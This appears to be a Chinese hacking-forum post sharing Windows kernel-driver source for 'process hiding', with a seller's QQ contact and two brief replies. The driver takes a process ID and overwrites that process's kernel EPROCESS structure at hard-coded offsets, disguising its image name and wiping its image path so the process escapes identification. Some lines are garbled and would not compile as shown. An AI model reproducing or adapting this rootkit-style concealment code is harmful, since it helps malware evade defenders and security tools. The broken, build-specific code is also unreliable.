开源c++进程隐藏/傀儡进程源码
另外出驱动隐藏和驱动伪装兼容全平台c++源码qq2744228667#include <ntifs.h>
#include <stdlib.h>
// Names the driver registers: the device object created in DriverEntry and the
// `\??\` symbolic link that makes it openable by name (deleted again in UnloadDriver).
// NOTE(review): on this page the space after `#define` is missing on both lines,
// presumably lost in extraction; as written they do not preprocess.
#define_DEVICE_NAME L"\\device\\mydevice"
#define_SYB_NAME L"\\??\\sysmblicname"
// Request layout DispatchWrite expects in the IRP's buffered SystemBuffer.
// NOTE(review): DispatchWrite reads all three fields without checking that the
// caller supplied at least sizeof(DATA) bytes.
typedef struct _DATA_
{
INT vid; // selects which of the two hard-coded EPROCESS offset sets DispatchWrite uses (0 or non-zero)
INT cid; // value DispatchWrite copies (sizeof(int) bytes) over the EPROCESS at `offset`
INT pid; // process id handed to PsLookupProcessByProcessId
}DATA, * PDATA;
//0x8 bytes (sizeof)
// Local mirror of the first field of the kernel's SE_AUDIT_PROCESS_CREATION_INFO.
// DispatchWrite overlays it on the EPROCESS at `seinfooffset` to reach the
// OBJECT_NAME_INFORMATION that holds the process image path.
typedef struct _SE_AUDIT_PROCESS_CREATION_INFOs
{
struct _OBJECT_NAME_INFORMATION* ImageFileName; //0x0
}SE_INFO;
//0x10 bytes (sizeof)
// Local mirror of OBJECT_NAME_INFORMATION: the UNICODE_STRING whose Buffer
// DispatchWrite zeroes (Name.Length bytes) and then prints.
typedef struct _OBJECT_NAME_INFORMATIONs
{
struct _UNICODE_STRING Name; //0x0
}OBNAME;
// Create handler installed via DriverObject->MajorFunction in DriverEntry:
// logs and completes the IRP. Unlike DispatchWrite it does not set
// pIrp->IoStatus.Status or .Information before completing. pDevice is unused.
NTSTATUS DisPatchCreate(PDEVICE_OBJECT pDevice, PIRP pIrp)
{
DbgPrintEx(77, 0, "创建成功\n"); // "create succeeded"; component id 77, level 0
IoCompleteRequest(pIrp, 0); // priority boost 0
return STATUS_SUCCESS;
}
// Write handler installed via DriverObject->MajorFunction in DriverEntry.
// Interprets the buffered-I/O SystemBuffer as a DATA request and, for the process
// named by DATA.pid, overwrites bytes of its EPROCESS at hard-coded offsets: the
// image name (with pFakeName), the buffer behind the SE audit image path (zeroed),
// and one int at `offset` (with DATA.cid).
// Risk notes: SystemBuffer is used without comparing the request's write length
// against sizeof(DATA), so any caller allowed to open the device drives these
// kernel writes with a buffer of its choosing. The offsets are bare literals
// chosen by DATA.vid and look build-specific; on any other build the writes land
// on unrelated EPROCESS bytes.
NTSTATUS DispatchWrite(PDEVICE_OBJECT pDevice, PIRP pIrp)
{
//1: 0x440
//0:0x2e8
int offset = 0; // EPROCESS offset that receives DATA.cid
int nameoffset = 0; // EPROCESS offset that receives the bytes of pFakeName
int seinfooffset = 0; // EPROCESS offset read through SE_INFO
ULONG retlen = 0; // never changed; Information is reported as 0 below
int pid = 0;
PVOID pMes = pIrp->AssociatedIrp.SystemBuffer; // buffered-I/O copy of the caller's data (DO_BUFFERED_IO)
pid = ((PDATA)pMes)->pid;
DbgPrint(":%d\n", pid);
PUCHAR pFakeName = "Todeskpp"; // fixed replacement image name
UCHAR fkpath = {0}; // unused
PEPROCESS pEprocess;
NTSTATUS status = STATUS_SUCCESS;
int id = ((PDATA)pMes)->cid;
status = PsLookupProcessByProcessId(pid, &pEprocess); // takes a reference on the EPROCESS; nothing in this function releases it
if (NT_SUCCESS(status))
{
if (((PDATA)pMes)->vid == 0)
{
// offset set selected by vid == 0
offset = 0x2e8;
nameoffset = 0x450;
seinfooffset = 0x468;
}
else
{
// offset set selected by vid != 0
offset = 0x440;
nameoffset = 0x5a8;
seinfooffset = 0x5c0;
}
// Copies strlen(pFakeName) bytes (no terminator) into the EPROCESS; nothing bounds this against the destination field.
RtlCopyMemory((PUCHAR)pEprocess + nameoffset, pFakeName, strlen(pFakeName));
SE_INFO* sei = (PUCHAR)pEprocess + seinfooffset; // implicit PUCHAR -> SE_INFO* conversion
OBNAME* obn = sei->ImageFileName; // not checked for NULL before the dereferences below
RtlZeroMemory(obn->Name.Buffer, obn->Name.Length); // wipes the stored image path in place
RtlCopyMemory((PUCHAR)pEprocess + offset, &id, sizeof(int));
DbgPrint(":%wZ\n", obn->Name);
}
pIrp->IoStatus.Information = retlen;
pIrp->IoStatus.Status = STATUS_SUCCESS; // reported as success even when the process lookup failed
// Indicates the caller has finished all processing of the given I/O request and returns the IRP to the I/O manager.
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
// Unload routine: removes the symbolic link and device object created in DriverEntry.
// NOTE(review): on this page the space between the return type and the name
// (`VOIDUnloadDriver`) is missing, presumably lost in extraction.
VOIDUnloadDriver(PDRIVER_OBJECT pDriver)
{
DbgPrint("卸载成功\n"); // "unload succeeded"
if (pDriver->DeviceObject) // only when DriverEntry's IoCreateDevice produced a device
{
UNICODE_STRING uSymblicLinkname;
RtlInitUnicodeString(&uSymblicLinkname, _SYB_NAME);
IoDeleteSymbolicLink(&uSymblicLinkname); // return value ignored
IoDeleteDevice(pDriver->DeviceObject);
}
}
// Driver entry point: registers the unload routine, creates the device and its
// symbolic link, and installs the two dispatch routines.
// The return values of IoCreateDevice and IoCreateSymbolicLink are not checked,
// so pDevice is dereferenced even if device creation failed. RegistryPath is unused.
// NOTE(review): the two MajorFunction assignments carry no array subscript on
// this page (presumably lost in extraction); as written they do not compile.
NTSTATUS DriverEntry(
IN OUT PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
DriverObject->DriverUnload = UnloadDriver;
UNICODE_STRING uDeviceName;
UNICODE_STRING uSymbliclinkname;
PDEVICE_OBJECT pDevice; // uninitialized; only meaningful if IoCreateDevice succeeds
RtlInitUnicodeString(&uDeviceName, _DEVICE_NAME);
RtlInitUnicodeString(&uSymbliclinkname, _SYB_NAME);
IoCreateDevice(DriverObject, 0, &uDeviceName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDevice);
IoCreateSymbolicLink(&uSymbliclinkname, &uDeviceName); // `\??\` link that makes the device openable by name
pDevice->Flags &= ~DO_DEVICE_INITIALIZING;
pDevice->Flags |= DO_BUFFERED_IO; // requests arrive through AssociatedIrp.SystemBuffer (read by DispatchWrite)
DriverObject->MajorFunction = DisPatchCreate;
DriverObject->MajorFunction = DispatchWrite;
return STATUS_SUCCESS;
}
感谢分享,很给力!~ {:mad:}{:mad:}看看